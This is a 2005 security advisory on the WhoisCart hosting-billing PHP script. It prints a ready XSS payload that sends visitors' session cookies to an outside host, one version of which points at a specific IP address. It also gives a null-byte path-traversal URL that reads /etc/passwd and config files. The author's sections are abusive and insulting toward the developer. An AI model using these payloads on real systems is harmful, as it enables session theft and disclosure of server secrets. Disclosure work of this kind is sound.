Subject:
Saeven.net's WhoisCart (all versions released prior to this disclosure) is vulnerable in
that it allows an attacker to insert Javascript into user viewed pages, and also to view
any world readable file on the server hosting the WhoisCart software.


Severity:
Severe; These vulnerabilities can allow an attacker to access literally access any part
of a system, as plaintext database passwords can be read from the WhoisCart
configuration, or users' session ID cookies stolen, and used to access user accounts.


Preamble:
(Taken from http://www.whoiscart.net/)
Able to remember, and apt at making your life easier - Whois.Cart 2.2 is a hosting and
domains shopping cart and billing management system that will most likely be your best
friend during your domain hosting and registration business venture. Easily skinned
using our versatile theme architecture, with support for over a dozen payment portals,
fourteen different languages, and capable of all billing recurrences; the system is
quickly becoming the most popular and highest rated script in its class [1]. Coded
entirely in PHP, we challenge you to find a system faster than ours. Long-ranked in
Zend's Top 10, and by far the most feature packed software for its price - come and see
why exactly 3155 users just can't be wrong.


Problem:
The first vulnerability, involving Javascript injection, and ultimately session ID
extraction, is exploited by utilizing an unsecured user input field.

http://yourdomain.com/whoiscart/profile.php?page=INSERT_JAVASCRIPT_HERE

Basically, url encode some Javascript, like so:

<body onload=document.forms[0].submit(document.cookie)><form name=form1
action=http://yourmaliciousdomain.com/somescript></form></body>

turns into:

%3Cbody+onload%3Ddocument.forms%5B0%5D.submit%28document.cookie%29%3E%3Cform+name%3Dform1+action%3Dhttp%3A%2F%2F12.202.41.221%2F%7Evic%2Ftest.php%3E%3C%2Fform%3E%3C%2Fbody%3E

Then that url encoded Javascript is inserted at the appropriate location above.


Next Problem:
The next vulnerability involves the plain-text printing of any world readable file on
the system (including any and all configuration files used to run WhoisCart, store
session IDs, store plaintext database passwords, etc.).

http://yourdomain.com/whoiscart/?language=../../../../../../../../../../../../../etc/passwd%00

There you have the ability to read any world readable file on the server. The %00 is to
append a null character, as to avoid getting something like /etc/passwd.php.


Workaround:
Use different software, not written by a 12 year old (no offense to any kids reading
this, but think about security, for once). The vulnerabilities shown here are indicative
of a truly inferior software product. The product is not even feature complete. The beta
that's been in progress for 2 years, can be seen at http://beta.whoiscart.net/admin/,
barely started. Vulnerabilities like this still exist, and have existed throughout the
software since its inception. The only fix for this is for Saeven.net to release a new
product, rewritten from the ground up, or for the consumer to choose a new product
altogether (yes, there are better ones on the market for the same price, try Google). If
a software allows the unauthorized viewing of globally readable files, the software has
already failed, and deserves to be shot down such as this.


Vendor Contact:
    saeven.net consulting
    Alexandre Lemaire        (registrations@saeven.net)
    1968 Portobello blvd
    Orleans
    Ontario,K4A 4E0
    CA
    Tel. +91.226370256    (If you call, careful you don't get his mom)


Disclosure Timeline:
Vendor Notified: June 21, 2005
Public Release: June 22, 2005


About the Author:
The author is a software engineer, with an absolute detest for bullshit. Sometimes I
detest some languages, because they allow punks like this to write shit software, and
then the dumbass programmer puts up a website, uses the word "innovative", and ends up
ultimately screwing over a few hundred people, who maintain the personal information of
thousands of people. Identity theft starts with "companies" such as this. Choose a
trusted solution. The ability to crunch a few numbers, or execute a few lines of PHP,
does NOT make something trustworthy. A company with a non-ficticious in-house lawyer is
a good start, and then a company who knows what the fuck they're doing when it comes to
software design and implementation is stellar.

It is this type of bullshit I detest, and I advise everyone against using this product,
for numerous reasons, all founding from the same core element: a product is not to be
trusted because of a flashy website, or because some kid lies about his age.


Conclusion:
Here is an email, verbatim from Mr. Lemaire:
<quote>
From: "S. Alexandre M. Lemaire" <saeven@saeven.net>
I'll indulge your comments.

    The truth is that I don't maintain the work on whois.cart currently. I
have a staff of 13 people working for me right now, the developments are
intense and I don't have the time to monitor them as I usually would.  They
package and operate independently from myself.  My user community knows well
(as I post frequent updates in the forums) that I'm currently vested into
our other project, our helpdesk.  We have a user base of 3000+, you aren't
the only one to submit bug reports - note also that the people that work for
me, aren't bored teenagers.  They are people with M.Scs and PhDs in computer
science and related fields, who've agreed to partake in the whois.cart
project on their spare time initially.  Your concern for security, is not
exclusive.
</quote>

Show me a person with a Masters or PHd in Computer Science that both works in the
webhosting software industry and writes shit software like this, and I will show you
shit that smells like roses.

--